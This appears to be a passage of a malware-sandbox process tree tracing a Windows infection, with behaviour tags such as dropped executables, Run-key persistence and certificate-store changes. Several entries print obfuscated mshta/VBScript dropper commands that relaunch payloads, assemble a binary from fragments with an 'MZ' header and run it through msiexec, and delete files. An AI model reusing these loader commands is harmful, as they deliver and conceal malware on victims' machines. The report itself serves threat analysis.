- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e6⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e7⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e8⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e9⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e10⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e12⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e13⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e14⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e15⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e16⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e17⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e18⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e19⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e20⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e21⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e22⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e23⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e24⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e25⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e26⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e27⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e28⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e29⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e30⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e31⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\nslookup.exeC:\Windows\SysWOW64\nslookup.exe32⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\w1Qr3z_UriUutAzBdJlGZleB.exe"C:\Users\Admin\Pictures\Adobe Films\w1Qr3z_UriUutAzBdJlGZleB.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\3ntxIvNO4gdqLCZTEKYoD5OS.exe"C:\Users\Admin\Pictures\Adobe Films\3ntxIvNO4gdqLCZTEKYoD5OS.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\Vr6UhpPn3vnrngst4or6bPkp.exe"C:\Users\Admin\Pictures\Adobe Films\Vr6UhpPn3vnrngst4or6bPkp.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\moY4wW3E0qIMJdKiUqS7p9LE.exe"C:\Users\Admin\Pictures\Adobe Films\moY4wW3E0qIMJdKiUqS7p9LE.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\ZYPtO67joxDPHN7OiyLkZikp.exe"C:\Users\Admin\Pictures\Adobe Films\ZYPtO67joxDPHN7OiyLkZikp.exe"2⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"3⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe"C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe"2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\PynfcVpLPqPvCAES36qMtTu_.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "PynfcVpLPqPvCAES36qMtTu_.exe" -F5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\yJvvpFMTC2oHk_J4a2l2BZEX.exe"C:\Users\Admin\Pictures\Adobe Films\yJvvpFMTC2oHk_J4a2l2BZEX.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0IUTA.tmp\yJvvpFMTC2oHk_J4a2l2BZEX.tmp"C:\Users\Admin\AppData\Local\Temp\is-0IUTA.tmp\yJvvpFMTC2oHk_J4a2l2BZEX.tmp" /SL5="$303D0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\yJvvpFMTC2oHk_J4a2l2BZEX.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-Q6GRU.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-Q6GRU.tmp\DYbALA.exe" /S /UID=27104⤵
-
C:\Program Files\Common Files\VBNQPMRAFB\foldershare.exe"C:\Program Files\Common Files\VBNQPMRAFB\foldershare.exe" /VERYSILENT5⤵
-
C:\Users\Admin\AppData\Local\Temp\ed-5fe95-af4-86cb4-694795ab04647\Jotitojyzhae.exe"C:\Users\Admin\AppData\Local\Temp\ed-5fe95-af4-86cb4-694795ab04647\Jotitojyzhae.exe"5⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\a8-5b8b6-6a2-89cb2-d325863432396\Kalelaqoku.exe"C:\Users\Admin\AppData\Local\Temp\a8-5b8b6-6a2-89cb2-d325863432396\Kalelaqoku.exe"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x3oi3eek.nyj\GcleanerEU.exe /eufive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\x3oi3eek.nyj\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\x3oi3eek.nyj\GcleanerEU.exe /eufive7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nbcvu4jz.o4w\installer.exe /qn CAMPAIGN="654" & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\nbcvu4jz.o4w\installer.exeC:\Users\Admin\AppData\Local\Temp\nbcvu4jz.o4w\installer.exe /qn CAMPAIGN="654"7⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\nbcvu4jz.o4w\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\nbcvu4jz.o4w\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635082403 /qn CAMPAIGN=""654"" " CAMPAIGN="654"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aytwpv54.3qv\any.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\aytwpv54.3qv\any.exeC:\Users\Admin\AppData\Local\Temp\aytwpv54.3qv\any.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\aytwpv54.3qv\any.exe"C:\Users\Admin\AppData\Local\Temp\aytwpv54.3qv\any.exe" -u8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jaq4eo4w.xdp\gcleaner.exe /mixfive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\jaq4eo4w.xdp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\jaq4eo4w.xdp\gcleaner.exe /mixfive7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2tvqfczm.q0d\autosubplayer.exe /S & exit6⤵
-
C:\Users\Admin\Pictures\Adobe Films\kFRqN4Hc4UL5STN4QTkWyQbn.exe"C:\Users\Admin\Pictures\Adobe Films\kFRqN4Hc4UL5STN4QTkWyQbn.exe"2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09977fdc12334.exeWed09977fdc12334.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\mkUYpAqnTT_Y6NFFnI0BnMAQ.exe"C:\Users\Admin\Pictures\Adobe Films\mkUYpAqnTT_Y6NFFnI0BnMAQ.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\VJLY_KstCN_8p2Gf_Rv0VShA.exe"C:\Users\Admin\Pictures\Adobe Films\VJLY_KstCN_8p2Gf_Rv0VShA.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\ZzEa6lWClVPLFIq3UqymzBXh.exe"C:\Users\Admin\Pictures\Adobe Films\ZzEa6lWClVPLFIq3UqymzBXh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\I2wZwOb3RRI8z1uO0uqbagJA.exe"C:\Users\Admin\Pictures\Adobe Films\I2wZwOb3RRI8z1uO0uqbagJA.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\FcV14WEg5407DrTsHvKslqZf.exe"C:\Users\Admin\Pictures\Adobe Films\FcV14WEg5407DrTsHvKslqZf.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FcV14WEg5407DrTsHvKslqZf.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FcV14WEg5407DrTsHvKslqZf.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FcV14WEg5407DrTsHvKslqZf.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\E67re5CdQRiyZeOq0TjTHrFT.exe"C:\Users\Admin\Pictures\Adobe Films\E67re5CdQRiyZeOq0TjTHrFT.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\FwHqtgaeyOSwZ8d9WMwXxCEz.exe"C:\Users\Admin\Pictures\Adobe Films\FwHqtgaeyOSwZ8d9WMwXxCEz.exe"2⤵
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\gkYTnqBZBqUPnzpamoekAIM0.exe"C:\Users\Admin\Documents\gkYTnqBZBqUPnzpamoekAIM0.exe"3⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\lV9_TEwuM5VN8iP3KY2Rmw3n.exe"C:\Users\Admin\Pictures\Adobe Films\lV9_TEwuM5VN8iP3KY2Rmw3n.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\TVQZlpNkcFCBtgxDky_8XLsb.exe"C:\Users\Admin\Pictures\Adobe Films\TVQZlpNkcFCBtgxDky_8XLsb.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\UHFLTWpdq9qG2qWSoVixA_pf.exe"C:\Users\Admin\Pictures\Adobe Films\UHFLTWpdq9qG2qWSoVixA_pf.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\uphVV8ghcsrAKvTLycJGCo_b.exe"C:\Users\Admin\Pictures\Adobe Films\uphVV8ghcsrAKvTLycJGCo_b.exe"4⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\EWnx129zDeiQSYhyoL3PSDof.exe"C:\Users\Admin\Pictures\Adobe Films\EWnx129zDeiQSYhyoL3PSDof.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6P5PT.tmp\twjpSfW7b7DaWXoO_nabM6tv.tmp"C:\Users\Admin\AppData\Local\Temp\is-6P5PT.tmp\twjpSfW7b7DaWXoO_nabM6tv.tmp" /SL5="$C0280,506127,422400,C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-8EU2N.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-8EU2N.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Uninstall Information\GHGLGAOUIE\foldershare.exe"C:\Program Files\Uninstall Information\GHGLGAOUIE\foldershare.exe" /VERYSILENT7⤵
-
C:\Users\Admin\AppData\Local\Temp\c3-a46f7-c05-3c786-c08d40efc309d\Ralyxixaeco.exe"C:\Users\Admin\AppData\Local\Temp\c3-a46f7-c05-3c786-c08d40efc309d\Ralyxixaeco.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\9e-30c38-407-bc28f-32adaa9fe3465\Wysadudaecu.exe"C:\Users\Admin\AppData\Local\Temp\9e-30c38-407-bc28f-32adaa9fe3465\Wysadudaecu.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y5uceszc.nhe\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\y5uceszc.nhe\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\y5uceszc.nhe\GcleanerEU.exe /eufive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1gnwef2n.j2h\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\1gnwef2n.j2h\installer.exeC:\Users\Admin\AppData\Local\Temp\1gnwef2n.j2h\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tsx1tqo0.ikp\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\tsx1tqo0.ikp\any.exeC:\Users\Admin\AppData\Local\Temp\tsx1tqo0.ikp\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\tsx1tqo0.ikp\any.exe"C:\Users\Admin\AppData\Local\Temp\tsx1tqo0.ikp\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4vwqq4fr.4te\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\4vwqq4fr.4te\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\4vwqq4fr.4te\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oghbpm0r.bte\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "zB7_0GOQqQ5HH8ie1hSkX10G.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\kz0TRXTqgY84jnr15mFDIwO1.exe"C:\Users\Admin\Pictures\Adobe Films\kz0TRXTqgY84jnr15mFDIwO1.exe"4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"6⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x194,0x204,0x7ffbcabcdec0,0x7ffbcabcded0,0x7ffbcabcdee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=1724 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1648 /prefetch:27⤵
-
